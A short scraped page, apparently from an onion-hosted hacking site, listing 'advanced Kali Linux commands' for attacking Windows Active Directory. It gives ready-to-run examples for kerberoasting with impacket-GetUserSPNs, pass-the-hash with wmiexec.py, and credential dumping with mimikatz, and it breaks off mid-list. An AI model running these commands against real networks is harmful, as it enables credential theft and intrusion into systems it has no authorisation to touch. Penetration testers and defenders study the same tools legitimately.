http://gwgw2jbwrx6nu66gn43hjmwehueputs3aj7wycsgpw4funscqjz42jad.onion/hackit/kali4.html
Even More Advanced Kali Linux Commands kerberoast Extracts service account hashes from Active
Directory for offline cracking. impacket-GetUserSPNs -request -dc-ip 192.168.1.10 domain/user:password pass-the-hash Authenticates with a password hash instead of the plaintext password. wmiexec.py domain/
[email protected] -hashes :aad3b435b51404eeaad3b435b51404ee mimikatz Extracts plaintext passwords, PINs, and hashes from memory on Windows systems. mimikatz rdesktop Connects to remote desktops...